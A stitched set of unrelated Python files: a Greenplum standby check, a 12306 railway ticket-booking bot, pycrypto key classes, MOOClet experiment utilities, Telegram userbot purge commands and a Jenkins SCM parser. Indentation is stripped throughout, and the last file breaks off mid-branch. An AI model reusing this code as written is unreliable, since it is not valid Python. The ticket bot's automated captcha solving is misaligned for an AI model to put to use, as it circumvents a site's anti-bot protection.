gpsync_count = int(out[0])
if ok and gpsync_count != 0:
log_fatal('Cannot run this script on a passive standby instance')
log_fatal('where there is a conflict with the current value of')
log_fatal('the MASTER_DATA_DIRECTORY environment variable setting.')
return True
if gpsync_count != 0:
log_fatal('Cannont run this script on the standby instance')
log_fatal('Status indicates that standby instance process not running')
log_fatal('Check standby process status via gpstate -f on Master instance')
return True
return False
def get_copy_filter(host, port):
# pg8000 connects to master in utility mode
db = None
databases = None
filters = []
try:
db = pg8000.Connection(host=host, user=ENV.USER, database='template1', port=port, options='-c gp_session_role=utility')
# get list of user databases
# select oid, datname from pg_database where oid >= 16384;
db.execute('select oid, datname from pg_database where oid >= 16384')
# db.execute('select oid, datname from pg_database')
databases = [ r for r in db.iterate_tuple() ]
except Exception, e:
print str(e)
return None
finally:
if db:
db.close()
db = None
# foreach database
for d in databases:
try:
oid = d[0]
datname = d[1]
db = pg8000.Connection(host=host, user=ENV.USER, database=datname, port=port, options='-c gp_session_role=utility')
# get user table filter (user table, TOAST table, sequences)
# select oid from pg_class where old >= 16384 and relkind='r';
db.execute("select oid from pg_class where oid >= 16384 and relkind='r'")
table_filter = [ r[0] for r in db.iterate_tuple() ]
# get user TOAST table filter
# select oid from pg_class where old >= 16384 and relkind='t';
db.execute("select oid from pg_class where oid >= 16384 and relkind='t'")
toast_filter = [ r[0] for r in db.iterate_tuple() ]
# get sequences filter
# select oid from pg_class where old >= 16384 and relkind='S';
db.execute("select oid from pg_class where oid >= 16384 and relkind='S'")
sequence_filter = [ r[0] for r in db.iterate_tuple() ]
# get index filter
# select oid from pg_class where old >= 16384 and relkind='i';
db.execute("select oid from pg_class where oid >= 16384 and relkind='i'")
index_filter = [ r[0] for r in db.iterate_tuple() ]
filters.append((oid, table_filter, toast_filter, sequence_filter, index_filter))
except Exception, e:
print str(e)
continue
finally:
if db:
db.close()
db = None
return filters
|
StarcoderdataPython
|
11229353
|
# Moved to test/python/test_torch_ad
|
StarcoderdataPython
|
206262
|
import sys
sys.stdin = open('input.txt')
raw_input()
result = []
while True:
line = raw_input().strip()
if line == '___________':
break
binStr = line.replace(' ', '0').replace(
'o', '1').strip('|').replace('.', '')
# print binStr
n = int(binStr, base=2)
result.append(chr(n))
print ''.join(result)
|
StarcoderdataPython
|
8041314
|
# coding=utf-8
import datetime
import time
from inter.CheckRandCodeAnsyn import checkRandCodeAnsyn
from inter.GetPassengerDTOs import getPassengerDTOs
from inter.GetRandCode import getRandCode
from inter.QueryOrderWaitTime import queryOrderWaitTime
class confirmSingleForQueue:
def __init__(self, session, ifShowPassCodeTime, is_node_code, token, set_type, ticket_peoples, ticketInfoForPassengerForm,
oldPassengerStr, passengerTicketStrList):
self.session = session
self.ifShowPassCodeTime = ifShowPassCodeTime
self.is_node_code = is_node_code
self.token = token
self.set_type = set_type
self.ticket_peoples = ticket_peoples
self.ticketInfoForPassengerForm = ticketInfoForPassengerForm
self.passengerTicketStrList = passengerTicketStrList
self.oldPassengerStr = oldPassengerStr
def data_par(self):
"""
模拟提交订单是确认按钮,参数获取方法还是get_ticketInfoForPassengerForm 中获取
:return:
"""
if not self.passengerTicketStrList and not self.oldPassengerStr:
s = getPassengerDTOs(session=self.session, ticket_peoples=self.ticket_peoples, set_type=self.set_type)
getPassengerDTOsResult = s.getPassengerTicketStrListAndOldPassengerStr()
if getPassengerDTOsResult.get("status", False):
self.passengerTicketStrList = getPassengerDTOsResult.get("passengerTicketStrList", "")
self.oldPassengerStr = getPassengerDTOsResult.get("oldPassengerStr", "")
data = {
"passengerTicketStr": self.passengerTicketStrList.rstrip("_{0}".format(self.set_type)),
"oldPassengerStr": "".join(self.oldPassengerStr),
"purpose_codes": self.ticketInfoForPassengerForm["purpose_codes"],
"key_check_isChange": self.ticketInfoForPassengerForm["key_check_isChange"],
"leftTicketStr": self.ticketInfoForPassengerForm["leftTicketStr"],
"train_location": self.ticketInfoForPassengerForm["train_location"],
"seatDetailType": "", # 开始需要选择座位,但是目前12306不支持自动选择作为,那这个参数为默认
"roomType": "00", # 好像是根据一个id来判断选中的,两种 第一种是00,第二种是10,但是我在12306的页面没找到该id,目前写死是00,不知道会出什么错
"dwAll": "N",
"whatsSelect": 1,
"_json_at": "",
"randCode": "",
"choose_seats": "",
"REPEAT_SUBMIT_TOKEN": self.token,
}
return data
def sendConfirmSingleForQueue(self):
"""
# 模拟查询当前的列车排队人数的方法
# 返回信息组成的提示字符串
:return:
"""
data = self.data_par()
checkQueueOrderUrl = self.session.urls["checkQueueOrderUrl"]
try:
if self.is_node_code:
print(u"正在使用自动识别验证码功能")
for i in range(3):
randCode = getRandCode(is_auto_code=True, auto_code_type=2)
checkcode = checkRandCodeAnsyn(self.session, randCode, self.token)
if checkcode == 'TRUE':
print(u"验证码通过,正在提交订单")
data['randCode'] = randCode
break
else:
print (u"验证码有误, {0}次尝试重试".format(i + 1))
print(u"验证码超过限定次数3次,放弃此次订票机会!")
else:
print(u"不需要验证码")
time.sleep(self.ifShowPassCodeTime)
checkQueueOrderResult = self.session.httpClint.send(checkQueueOrderUrl, data)
if "status" in checkQueueOrderResult and checkQueueOrderResult["status"]:
c_data = checkQueueOrderResult["data"] if "data" in checkQueueOrderResult else {}
if 'submitStatus' in c_data and c_data['submitStatus'] is True:
# print(u"提交订单成功!")
qow = queryOrderWaitTime(self.session)
qow.sendQueryOrderWaitTime()
else:
if 'errMsg' in c_data and c_data['errMsg']:
print(u"提交订单失败,{0}".format(c_data['errMsg']))
else:
print(c_data)
print(u'订票失败!很抱歉,请重试提交预订功能!')
elif "messages" in checkQueueOrderResult and checkQueueOrderResult["messages"]:
print(u"提交订单失败,错误信息: " + checkQueueOrderResult["messages"])
else:
print(u"提交订单中,请耐心等待:" + checkQueueOrderResult["message"])
except ValueError:
print(u"接口 {} 无响应".format(checkQueueOrderUrl))
|
StarcoderdataPython
|
3418688
|
<reponame>J-E-J-S/aaRS-Pipeline
#
# pubkey.py : Internal functions for public key operations
#
# Part of the Python Cryptography Toolkit
#
# Written by <NAME>, <NAME>, and others
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
#
__revision__ = "$Id$"
import types, warnings
from Crypto.Util.number import *
# Basic public key class
class pubkey:
def __init__(self):
pass
def __getstate__(self):
"""To keep key objects platform-independent, the key data is
converted to standard Python long integers before being
written out. It will then be reconverted as necessary on
restoration."""
d=self.__dict__
for key in self.keydata:
if d.has_key(key): d[key]=long(d[key])
return d
def __setstate__(self, d):
"""On unpickling a key object, the key data is converted to the big
number representation being used, whether that is Python long
integers, MPZ objects, or whatever."""
for key in self.keydata:
if d.has_key(key): self.__dict__[key]=bignum(d[key])
def encrypt(self, plaintext, K):
"""encrypt(plaintext:string|long, K:string|long) : tuple
Encrypt the string or integer plaintext. K is a random
parameter required by some algorithms.
"""
wasString=0
if isinstance(plaintext, types.StringType):
plaintext=bytes_to_long(plaintext) ; wasString=1
if isinstance(K, types.StringType):
K=bytes_to_long(K)
ciphertext=self._encrypt(plaintext, K)
if wasString: return tuple(map(long_to_bytes, ciphertext))
else: return ciphertext
def decrypt(self, ciphertext):
"""decrypt(ciphertext:tuple|string|long): string
Decrypt 'ciphertext' using this key.
"""
wasString=0
if not isinstance(ciphertext, types.TupleType):
ciphertext=(ciphertext,)
if isinstance(ciphertext[0], types.StringType):
ciphertext=tuple(map(bytes_to_long, ciphertext)) ; wasString=1
plaintext=self._decrypt(ciphertext)
if wasString: return long_to_bytes(plaintext)
else: return plaintext
def sign(self, M, K):
"""sign(M : string|long, K:string|long) : tuple
Return a tuple containing the signature for the message M.
K is a random parameter required by some algorithms.
"""
if (not self.has_private()):
raise TypeError('Private key not available in this object')
if isinstance(M, types.StringType): M=bytes_to_long(M)
if isinstance(K, types.StringType): K=bytes_to_long(K)
return self._sign(M, K)
def verify (self, M, signature):
"""verify(M:string|long, signature:tuple) : bool
Verify that the signature is valid for the message M;
returns true if the signature checks out.
"""
if isinstance(M, types.StringType): M=bytes_to_long(M)
return self._verify(M, signature)
# alias to compensate for the old validate() name
def validate (self, M, signature):
warnings.warn("validate() method name is obsolete; use verify()",
DeprecationWarning)
def blind(self, M, B):
"""blind(M : string|long, B : string|long) : string|long
Blind message M using blinding factor B.
"""
wasString=0
if isinstance(M, types.StringType):
M=bytes_to_long(M) ; wasString=1
if isinstance(B, types.StringType): B=bytes_to_long(B)
blindedmessage=self._blind(M, B)
if wasString: return long_to_bytes(blindedmessage)
else: return blindedmessage
def unblind(self, M, B):
"""unblind(M : string|long, B : string|long) : string|long
Unblind message M using blinding factor B.
"""
wasString=0
if isinstance(M, types.StringType):
M=bytes_to_long(M) ; wasString=1
if isinstance(B, types.StringType): B=bytes_to_long(B)
unblindedmessage=self._unblind(M, B)
if wasString: return long_to_bytes(unblindedmessage)
else: return unblindedmessage
# The following methods will usually be left alone, except for
# signature-only algorithms. They both return Boolean values
# recording whether this key's algorithm can sign and encrypt.
def can_sign (self):
"""can_sign() : bool
Return a Boolean value recording whether this algorithm can
generate signatures. (This does not imply that this
particular key object has the private information required to
to generate a signature.)
"""
return 1
def can_encrypt (self):
"""can_encrypt() : bool
Return a Boolean value recording whether this algorithm can
encrypt data. (This does not imply that this
particular key object has the private information required to
to decrypt a message.)
"""
return 1
def can_blind (self):
"""can_blind() : bool
Return a Boolean value recording whether this algorithm can
blind data. (This does not imply that this
particular key object has the private information required to
to blind a message.)
"""
return 0
# The following methods will certainly be overridden by
# subclasses.
def size (self):
"""size() : int
Return the maximum number of bits that can be handled by this key.
"""
return 0
def has_private (self):
"""has_private() : bool
Return a Boolean denoting whether the object contains
private components.
"""
return 0
def publickey (self):
"""publickey(): object
Return a new key object containing only the public information.
"""
return self
def __eq__ (self, other):
"""__eq__(other): 0, 1
Compare us to other for equality.
"""
return self.__getstate__() == other.__getstate__()
def __ne__ (self, other):
"""__ne__(other): 0, 1
Compare us to other for inequality.
"""
return not self.__eq__(other)
|
StarcoderdataPython
|
233544
|
import itertools
import threading
import time
import sys
import os
from os import name, system
DEFAULT_FPS = 3
class Animator:
"""Base animator classes"""
def __init__(self):
self.fps = DEFAULT_FPS # the default frames per second
self.done = False
try:
self.columns, self.lines = os.get_terminal_size()
except Exception as e:
self.columns = 80
self.lines = 30
@property
def wait_between_frames(self):
return 1/self.fps
def clear(self):
# for windows
if name == 'nt':
_ = system('cls')
# for mac and linux(here, os.name is 'posix')
else:
_ = system('clear')
def carriage_return(self):
sys.stdout.write('\r')
def write(self, *args):
sys.stdout.write(*args)
def flush(self):
sys.stdout.flush()
def sleep(self, secs):
time.sleep(secs)
def clear_line(self):
self.carriage_return()
self.write(' '*(self.columns-3))
self.flush()
self.carriage_return()
def clear_line_decorator(self, func):
"""Decorator for animation functions
DOES NOT WORK YET!
"""
def wrapper():
self.clear_line()
func()
self.clear_line()
return wrapper
def animate(self, strings_to_draw, animate_fn=None):
if animate_fn is None:
animate_fn = self.animate_fn
animate_fn(strings_to_draw=strings_to_draw)
def animate_fn(self, strings_to_draw: list):
"""Animates the string objects in the strings to draw list.
Args:
strings_to_draw: List of strings that should be drawin in order
Returns:
nothing, but prints
"""
for string in strings_to_draw:
self.carriage_return()
self.write(string)
self.flush()
self.sleep(self.wait_between_frames)
self.write('\n')
def loop_animate(self, duration, strings_to_draw, animate_fn=None):
if animate_fn is None:
animate_fn = self.loop_animate_fn
t = threading.Thread(target=animate_fn,
kwargs={'strings_to_draw': strings_to_draw})
t.start()
# sleep while the animation is drawing
self.sleep(duration)
self.done = True
def loop_animate_fn(self, strings_to_draw: list):
"""Looping animation the string objects in the strings to draw list.
Args:
strings_to_draw: List of strings that should be drawin in order
Returns:
nothing, but prints
"""
# reset done just in case this function has already been called.
self.done = False
for c in itertools.cycle(strings_to_draw):
if self.done:
break
self.carriage_return()
self.write(c)
self.flush()
self.sleep(self.wait_between_frames)
self.carriage_return()
self.write('\n')
|
StarcoderdataPython
|
6533051
|
from __future__ import unicode_literals
from numpy.random import choice
from collections import Counter
import pandas as pd
import numpy as np
from django.apps import apps
import string
def sample_no_replacement(full_set, previous_set=None):
# print "starting sample_no_replacement"
# if previous_set:
# print "prev set"
# print previous_set
# print full_set
if set(previous_set) == set(full_set):
#the user has seen each of the conditions of this vairbales at least once
cond_counts = Counter(previous_set)
#return a list of tuples of most common e.g.
#[('a', 5), ('r', 2), ('b', 2)]
cond_common_order = cond_counts.most_common()
# print "cond_common_order"
# print cond_common_order
if cond_common_order[0][1] == cond_common_order[-1][1]:
#all conds are evenly assigned, choose randomly
cond = cond_common_order[choice(len(cond_common_order))]
#print cond
cond = cond[0]
else:
#choose the one with least assignment
#(where same value is ordered arbitrarily)
cond = cond_common_order[-1][0]
else:
#subject hasn't seen all versions yet
cond_choices = set(full_set) - set(previous_set)
# print "cond_choices"
# print cond_choices
cond = choice(list(cond_choices))
return cond
def create_design_matrix(input_df, formula, add_intercept = True):
'''
:param input_df:
:param formula: for eaxmple "y ~ x0 + x1 + x2 + x0 * x1 + x1 * x2"
:param add_intercept: whether to add dummy columns of 1.
:return: the design matrix as a dataframe, each row corresponds to a data point, and each column is a regressor in regression
'''
D_df = pd.DataFrame()
input_df = input_df.astype(np.float64)
formula = str(formula)
# parse formula
formula = formula.strip()
all_vars_str = formula.split('~')[1].strip()
dependent_var = formula.split('~')[0].strip()
vars_list = all_vars_str.split('+')
vars_list = list(map(string.strip, vars_list))
''''#sanity check to ensure each var used in
for var in vars_list:
if var not in input_df.columns:
raise Exception('variable {} not in the input dataframe'.format((var)))'''
# build design matrix
for var in vars_list:
if '*' in var:
interacting_vars = var.split('*')
interacting_vars = list(map(string.strip,interacting_vars))
D_df[var] = input_df[interacting_vars[0]]
for i in range(1, len(interacting_vars)):
D_df[var] *= input_df[interacting_vars[i]]
else:
D_df[var] = input_df[var]
# add dummy column for bias
if add_intercept:
D_df.insert(0, 'Intercept', 1.)
return D_df
def values_to_df(mooclet, policyparams, latest_update=None):
"""
where variables is a list of variable names
note: as implemented this will left join on users which can result in NAs
"""
Value = apps.get_model('engine', 'Value')
variables = list(policyparams.parameters["contextual_variables"])
outcome = policyparams.parameters["outcome_variable"]
action_space = policyparams.parameters["action_space"]
variables.append(outcome)
if not latest_update:
values = Value.objects.filter(variable__name__in=variables, mooclet=mooclet) #mooclet=mooclet
else:
values = Value.objects.filter(variable__name__in=variables, timestamp__gte=latest_update, mooclet=mooclet)#.order_by('learner') #mooclet=mooclet
#TODO ONLY CARE ABOUT DATE ON OUTCOME
#outcomes = Value.objects.filter(variable__name=outcome, mooclet=mooclet, policy=policyparams.policy).order_by('learner')
#print("OUTCOMES")
#print(len(outcomes))
#values = values | outcomes
print("values")
print(len(values))
variables.append('user_id')
#variables.append(outcome)
variables.remove('version')
variables.extend(action_space.keys())
print("variables")
print(variables)
vals_to_df = pd.DataFrame({},columns=variables)
curr_user = None
curr_user_values = {}
#TODO: if the variable is "version" get the mapping to actions
for value in values:
#skip any values with no learners
if not value.learner:
continue
if curr_user is None:
curr_user = value.learner.id
curr_user_values = {'user_id': curr_user}
if value.learner.id != curr_user:
#append to df
try:
vals_to_df = vals_to_df.append(curr_user_values, ignore_index=True)
except ValueError:
print("duplicate data")
print(curr_user_values)
pass
curr_user = value.learner.id
curr_user_values = {'user_id': curr_user}
#transform mooclet version shown into dummified action
#todo silo off version as its own thing??? so that we always get most recent?
if value.variable.name == 'version':
action_config = policyparams.parameters['action_space']
#this is the numerical representation from the config
#IN THIS STEP ALSO GET AN OUTCOME RELATED TO THIS VERSION
for action in action_config:
action = action.encode('utf-8')
# print("current_version_json: ")
# print(value.version.version_json)
curr_action_config = value.version.version_json[action]
curr_user_values[action] = curr_action_config
#UNLESS IT IS AN OUTCOME IN WHICH CASE HANDLE AS ABOVE AND DISCARD
else:
curr_user_values[value.variable.name] = value.value
#print(curr_user_values)
else:
try:
vals_to_df = vals_to_df.append(curr_user_values, ignore_index=True)
except ValueError:
print("duplicate data")
print(curr_user_values)
pass
# print("values df: ")
# print(vals_to_df)
if not vals_to_df.empty:
output_df = vals_to_df.dropna()
else:
output_df = vals_to_df
# if vals_to_df :
# output_df = pd.concat(vals_to_df)
# output_df = output_df.dropna()
# #print output_df.head()
# else:
# output_df = pd.DataFrame()
print(output_df)
return output_df
|
StarcoderdataPython
|
3437439
|
import asyncio
import traceback
import time
import re
from pyrogram import filters
from bot import alemiBot
from util.permission import is_allowed, is_superuser, allow, disallow, serialize, list_allowed, ALLOWED
from util.user import get_username
from util.message import edit_or_reply, get_text, is_me
from util.text import split_for_window
from util.command import filterCommand
from util.time import parse_timedelta
from plugins.help import HelpCategory
import logging
logger = logging.getLogger(__name__)
HELP = HelpCategory("MANAGEMENT")
HELP.add_help("delme", "immediately delete message",
"add `-delme` at the end of a message to have it deleted after a time. " +
"If no time is given, message will be immediately deleted", args="[<time>]")
@alemiBot.on_message(filters.me & filters.regex(pattern=
r"(?:.*|)(?:-delme)(?: |)(?P<time>[0-9]+|)$"
), group=5)
async def deleteme(client, message):
logger.info("Deleting sent message")
t = message.matches[0]["time"]
if t != "":
await asyncio.sleep(float(t))
await message.delete()
async def get_user(arg, client):
if arg.isnumeric():
return await client.get_users(int(arg))
else:
return await client.get_users(arg)
HELP.add_help(["purge", "wipe", "clear"], "batch delete messages",
"delete messages last <n> messages (excluding this) sent by <targets> (can be a list of `@user`). If <n> is not given, will default to 1. " +
"If no target is given, messages from author of replied msg or self msgs will be deleted. You can give flag `-all` to delete from everyone. " +
"Search is limited to last 100 messages by default, add the `-full` flag to make an unbound (and maybe long, be careful!) search."
"A keyword (regex) can be specified (`-k`) so that only messages matching given pattern will be deleted. " +
"An offset can be specified with `-o`, to start deleting after a specific number of messages. " +
"A time frame can be given: you can limit deletion to messages before (`-before`) a certain time " +
"(all messages from now up to <time> ago), or after (`-after`) a certain interval (all messages older than <time>). " +
"Time can be given as a packed string like this : `8y3d4h15m3s` (years, days, hours, minutes, seconds), " +
"any individual token can be given in any position and all are optional, it can just be `30s` or `5m`. If " +
"you want to include spaces, wrap the 'time' string in `\"`. If you need to purge messages from an user without an @username, " +
"you can give its user id with the `-id` flag. If you need to provide more than 1 id, wrap them in `\"` and separate with a space.",
args="[-k <keyword>] [-o <n>] [-before <time>] [-after <time>] [-all] [-id <ids>] [<targets>] [<number>] [-full]", public=False)
@alemiBot.on_message(is_superuser & filterCommand(["purge", "wipe", "clear"], list(alemiBot.prefixes), options={
"keyword" : ["-k", "-keyword"],
"offset" : ["-o", "-offset"],
"ids" : ["-id"],
"before" : ["-before"],
"after" : ["-after"],
"limit" : ["-lim"]
}, flags=["-all", "-full"]))
async def purge(client, message):
args = message.command
target = []
opts = {}
number = 1
delete_all = "-all" in args["flags"]
keyword = re.compile(args["keyword"]) if "keyword" in args else None
offset = int(args["offset"]) if "offset" in args else 0
time_limit = time.time() - parse_timedelta(args["before"]).total_seconds() if \
"before" in args else None
hard_limit = "-full" not in args["flags"]
if "after" in args:
opts["offset_date"] = int(time.time() - parse_timedelta(args["after"]).total_seconds())
try:
if "cmd" in args:
for a in args["cmd"]:
if a.startswith("@"):
if a == "@me":
target.append(message.from_user.id)
else:
target.append((await get_user(a, client)).id)
elif a.isnumeric():
number = int(a)
if "ids" in args:
for single_id in args["ids"].split():
target.append(int(single_id))
if not target:
if message.reply_to_message:
target.append(message.reply_to_message.from_user.id)
else:
target.append(message.from_user.id)
logger.info(f"Purging last {number} message from {target}")
n = 0
total = 0
async for msg in client.iter_history(message.chat.id, **opts):
total += 1
if hard_limit and total > max(100, number):
break
if msg.message_id == message.message_id: # ignore message that triggered this
continue
if ((delete_all or msg.from_user.id in target)
and (not keyword or keyword.search(get_text(msg)))): # wait WTF why no raw here
if offset > 0: # do an offset like this because
offset -=1 # we want to offset messages from target user, not all messages
continue
await msg.delete()
n += 1
if n >= number:
break
if time_limit is not None and msg.date < time_limit:
break
await edit_or_reply(message, "` → ` Done")
except Exception as e:
traceback.print_exc()
await edit_or_reply(message, "`[!] → ` " + str(e))
await client.set_offline()
HELP.add_help(["merge"], "join multiple messages into one",
"join multiple messages sent by you into one. Reply to the first one to merge, bot will join " +
"every consecutive message you sent. You can stop the bot from deleting merged messages with " +
"`-nodel` flag. You can specify a separator with `-s`, it will default to `\n`. You can specify max " +
"number of messages to merge with `-max`.", args="[-s <sep>] [-max <n>] [-nodel]", public=False)
@alemiBot.on_message(is_superuser & filterCommand(["merge"], list(alemiBot.prefixes), options={
"separator" : ["-s"],
"max" : ["-max"]
}, flags=["-nodel"]))
async def merge_cmd(client, message):
if not message.reply_to_message:
return await edit_or_reply(message, "`[!] → ` No start message given")
m_id = message.reply_to_message.message_id
sep = message.command["separator"] if "separator" in message.command else "\n"
del_msg = "-nodel" not in message.command["flags"]
max_to_merge = message.command["max"] if "max" in message.command else -1
try:
logger.info(f"Merging messages")
out = ""
count = 0
async for msg in client.iter_history(message.chat.id, offset_id=m_id, reverse=True):
if msg.message_id == message.message_id or not is_me(msg) or msg.media \
or (max_to_merge > 0 and count >= max_to_merge):
break
out += msg.text.markdown + sep
count += 1
if del_msg and msg.message_id != m_id: # don't delete the one we want to merge into
await msg.delete()
await message.reply_to_message.edit(out)
await edit_or_reply(message, f"` → ` Merged {count} messages")
except Exception as e:
traceback.print_exc()
await edit_or_reply(message, "`[!] → ` " + str(e))
await client.set_offline()
HELP.add_help(["allow", "disallow", "revoke"], "allow/disallow to use bot",
"this command will work differently if invoked with `allow` or with `disallow`. Target user " +
"will be given/revoked access to public bot commands. ~~Use `@here` or `@everyone` to allow " +
"all users in this chat.", args="<target>")
@alemiBot.on_message(is_superuser & filterCommand(["allow", "disallow", "revoke"], list(alemiBot.prefixes)))
async def manage_allowed_cmd(client, message):
try:
users_to_manage = []
if message.reply_to_message is not None:
peer = message.reply_to_message.from_user
if peer is None:
return
users_to_manage.append(peer)
elif "cmd" in message.command:
if message.command["cmd"][0] in ["@here", "@everyone"]:
async for u in client.iter_chat_members(message.chat.id):
if u.user.is_bot:
continue
users_to_manage.append(u.user)
else:
user = None
try:
user = await client.get_users(message.command["cmd"][0])
except ValueError:
return await edit_or_reply(message, "`[!] → ` No user matched")
if user is None:
return await edit_or_reply(message, "`[!] → ` No user matched")
users_to_manage.append(user)
else:
return await edit_or_reply(message, "`[!] → ` Provide an ID or reply to a msg")
logger.info("Changing permissions")
out = ""
action_allow = message.command["base"] == "allow"
for u in users_to_manage:
u_name = get_username(u)
if action_allow:
if allow(u.id, val=u_name):
out += f"` → ` Allowed **{u_name}**\n"
else:
if disallow(u.id, val=u_name):
out += f"` → ` Disallowed **{u_name}**\n"
if out != "":
await edit_or_reply(message, out)
else:
await edit_or_reply(message, "` → ` No changes")
except Exception as e:
traceback.print_exc()
await edit_or_reply(message, f"`[!] → ` __{str(e)}__")
HELP.add_help(["trusted", "plist", "permlist"], "list allowed users",
"note that users without a username may give issues. Use `-s` to get " +
"the users individually if a batch request fails with 'InvalidPeerId'.", args="[-s]")
# broken af lmaooo TODO
@alemiBot.on_message(is_superuser & filterCommand(["trusted", "plist", "permlist"], list(alemiBot.prefixes), flags=["-s"]))
async def trusted_list(client, message):
try:
user_ids = list_allowed()
text = "`[` "
issues = ""
users = []
logger.info("Listing allowed users")
if "-s" in message.command["flags"]:
for uid in list_allowed():
try:
users.append(await client.get_users(uid))
except:
issues += f"~~[{uid}]~~ "
else:
users = await client.get_users([ int(u) for u in user_ids ]) # this thing gives a PeerIdInvalid exc???
for u in users:
text += f"{get_username(u)}, "
text += "`]`"
await edit_or_reply(message, f"` → Allowed Users : `\n{text}\n{issues}")
except Exception as e:
traceback.print_exc()
await edit_or_reply(message, f"`[!] → ` __{str(e)}__")
|
StarcoderdataPython
|
12820734
|
<reponame>javiergayala/jenkins-job-wrecker<filename>jenkins_job_wrecker/modules/scm.py
# encoding=utf8
import jenkins_job_wrecker.modules.base
class Scm(jenkins_job_wrecker.modules.base.Base):
component = 'scm'
def gen_yml(self, yml_parent, data):
scm = []
scm_class = None
if 'class' in data.attrib:
if data.attrib['class'] == 'hudson.scm.NullSCM':
return None
if data.attrib['class'] == 'org.jenkinsci.plugins.multiplescms.MultiSCM':
for scm in data[0]:
self.gen_yml(yml_parent, scm)
return
scm_class = data.attrib['class'].split('.')[-1].lower()
scm_tag = data.tag.split('.')[-1].lower()
if scm_tag in self.registry.registry[self.component]:
self.registry.dispatch(self.component, scm_tag, data, scm)
yml_parent.append(['scm', scm])
return
if scm_class is not None and scm_class in self.registry.registry[self.component]:
self.registry.dispatch(self.component, scm_class, data, scm)
yml_parent.append(['scm', scm])
return
raise NotImplementedError('%s scm not supported' % data.attrib['class'])
def gitscm(top, parent):
git = {}
for child in top:
if child.tag == 'configVersion':
continue # we don't care
elif child.tag == 'userRemoteConfigs':
if len(list(child)) != 1:
# expected "hudson.plugins.git.UserRemoteConfig" tag
raise NotImplementedError("%s not supported with %i "
"children" % (child.tag,
len(list(child))))
for setting in child[0]:
if setting.tag == 'credentialsId':
git['credentials-id'] = setting.text
else:
git[setting.tag] = setting.text
elif child.tag == 'gitTool':
git['git-tool'] = child.text
elif child.tag == 'excludedUsers':
if child.text:
users = child.text.split()
git['excluded-users'] = users
elif child.tag == 'buildChooser':
if child.attrib['class'] == \
'hudson.plugins.git.util.DefaultBuildChooser':
continue
else:
# see JJB's jenkins_jobs/modules/scm.py
# for other build choosers
raise NotImplementedError("%s build "
"chooser" % child.attrib['class'])
elif child.tag == 'disableSubmodules':
# 'false' is the default and needs no explict YAML.
if child.text == 'true':
raise NotImplementedError("TODO: %s" % child.tag)
elif child.tag == 'recursiveSubmodules':
# 'false' is the default and needs no explict YAML.
if child.text == 'true':
raise NotImplementedError("TODO: %s" % child.tag)
elif child.tag == 'authorOrCommitter':
# 'false' is the default and needs no explict YAML.
if child.text == 'true':
git['use-author'] = True
elif child.tag == 'useShallowClone':
# 'false' is the default and needs no explict YAML.
if child.text == 'true':
git['shallow-clone'] = True
elif child.tag == 'ignoreNotifyCommit':
# 'false' is the default and needs no explict YAML.
if child.text == 'true':
git['ignore-notify'] = True
elif child.tag == 'wipeOutWorkspace':
git['wipe-workspace'] = (child.text == 'true')
elif child.tag == 'skipTag':
# 'false' is the default and needs no explict YAML.
if child.text == 'true':
git['skip-tag'] = True
elif child.tag == 'pruneBranches':
# 'false' is the default and needs no explict YAML.
if child.text == 'true':
git['prune'] = True
elif child.tag == 'remotePoll':
# 'false' is the default and needs no explict YAML.
if child.text == 'true':
git['fastpoll'] = True
elif child.tag == 'relativeTargetDir':
# If it's empty, no explicit 'basedir' YAML needed.
if child.text:
git['basedir'] = child.text
elif child.tag == 'reference':
# If it's empty, we're good
if child.text or len(list(child)) > 0:
raise NotImplementedError(child.tag)
elif child.tag == 'gitConfigName':
# If it's empty, we're good
if child.text or len(list(child)) > 0:
raise NotImplementedError(child.tag)
elif child.tag == 'gitConfigEmail':
# If it's empty, we're good
if child.text or len(list(child)) > 0:
raise NotImplementedError(child.tag)
elif child.tag == 'scmName':
# If it's empty, we're good
if child.text or len(list(child)) > 0:
raise NotImplementedError(child.tag)
elif child.tag == 'branches':
if child[0][0].tag != 'name':
raise NotImplementedError("%s XML not supported"
% child[0][0].tag)
branches = []
for item in child:
for branch in item:
branches.append(branch.text)
git['branches'] = branches
elif child.tag == 'doGenerateSubmoduleConfigurations':
if len(list(child)) != 0:
raise NotImplementedError("%s not supported with %i children"
% (child.tag, len(list(child))))
# JJB doesn't handle this element anyway. Just continue on.
continue
elif child.tag == 'submoduleCfg':
if len(list(child)) > 0:
raise NotImplementedError("%s not supported with %i children"
% (child.tag, len(list(child))))
elif child.tag == 'browser':
# XXX: blunt hammer: just use the "auto" browser for everything.
git['browser'] = 'auto'
elif child.tag == 'extensions':
for extension in child:
# hudson.plugins.git.extensions.impl.RelativeTargetDirectory
if extension.tag == 'hudson.plugins.git.extensions.impl.RelativeTargetDirectory':
if len(list(extension)) != 1:
# expected <relativeTargetDir>
raise NotImplementedError("%s not supported with %i children" % (extension.tag, len(list(extension))))
if extension[0].tag != 'relativeTargetDir':
raise NotImplementedError("%s XML not supported" % extension[0].tag)
git['basedir'] = extension[0].text
elif extension.tag == 'hudson.plugins.git.extensions.impl.CheckoutOption':
if len(list(extension)) != 1:
# expected <timeout>
raise NotImplementedError("%s not supported with %i children" % (extension.tag, len(list(extension))))
if extension[0].tag != 'timeout':
raise NotImplementedError("%s XML not supported" % child[0][0].tag)
git['timeout'] = extension[0].text
elif extension.tag == 'hudson.plugins.git.extensions.impl.WipeWorkspace':
if len(list(extension)) != 0:
raise NotImplementedError("%s not supported with %i children" % (extension.tag, len(list(extension))))
git['wipe-workspace'] = True
elif extension.tag == 'hudson.plugins.git.extensions.impl.LocalBranch':
git['local-branch'] = extension[0].text
elif extension.tag == 'hudson.plugins.git.extensions.impl.PerBuildTag':
pass
elif extension.tag == 'hudson.plugins.git.extensions.impl.CleanBeforeCheckout':
